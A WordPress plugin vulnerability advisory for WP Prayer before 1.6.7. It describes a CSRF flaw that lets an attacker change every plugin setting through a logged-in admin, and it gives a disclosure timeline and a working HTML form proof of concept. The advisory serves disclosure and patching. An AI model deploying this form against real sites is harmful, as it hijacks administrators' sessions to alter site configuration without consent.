WordPress Plugin Vulnerabilities
WP Prayer < 1.6.7 - Arbitrary Plugin Settings Update via CSRF
Description
The plugin did not properly check for CSRF in some of its module functions, allowing attacker to make logged in admin change all plugin's settings (including the email settings) for example. v1.6.6 fixed most of CSRF checks, but the one in model.email_settings.php was improperly fixed (bypass still possible by providing a dummy nonce) Timeline: May 25th, 2021 - Vendor contacted May 31st, 2021 - Escalated to WP due to unresponsive vendor June 1st, 2021 - WP Investigating June 7th, 2021, v1.6.6 released, fixing the logic expect in model.email_settings.php. WP notified again about it June 13th, 2021 - v1.6.7 released, fixing the remaining CSRF issue
Proof of Concept
<html>
<body>
<form action="https://example.com/wp-admin/admin.php?page=wpe_manage_settings" method="POST" enctype="multipart/form-data">
<input type="hidden" name="wpe_prayer_form_title" value="CSRF Attack" />
<input type="hidden" name="wpe_prayer_list_title" value="" />
<input type="hidden" name="wpe_praise_list_title" value="" />
<input type="hidden" name="wpe_num_prayer_per_page" value="" />
<input type="hidden" name="wpe_prayer_btn_color" value="" />
<input type="hidden" name="wpe_prayer_btn_text_color" value="" />
<input type="hidden" name="wpe_pray_btn_color" value="" />
<input type="hidden" name="wpe_pray_text_color" value="" />
<input type="hidden" name="wpe_terms_and_condition" value="" />
<input type="hidden" name="wpe_num_of_characters_in_message" value="" />
<input type="hidden" name="wpe_prayer_Site_Key" value="" />
<input type="hidden" name="wpe_prayer_secret_key" value="" />
<input type="hidden" name="wpe_prayer_time_interval" value="" />
<input type="hidden" name="wpe_categorylist" value="Deliverance,Generational Healing,Inner Healing,Physical Healing,Protection,Relationships,Salvation,Spiritual Healing" />
<input type="hidden" name="wpe_fetch_req_from" value="all" />
<input type="hidden" name="wpe_save_settings" value="Save Settings" />
<input type="hidden" name="operation" value="save" />
<input type="hidden" name="page_options" value="wpe_api_key,wpe_scripts_place" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Affects Plugins
Fixed in version 1.6.7
Classification
Miscellaneous
Timeline
Publicly Published
2021-06-08 (about 1 years ago)
Added
2021-06-11 (about 1 years ago)
Last Updated
2021-06-13 (about 1 years ago)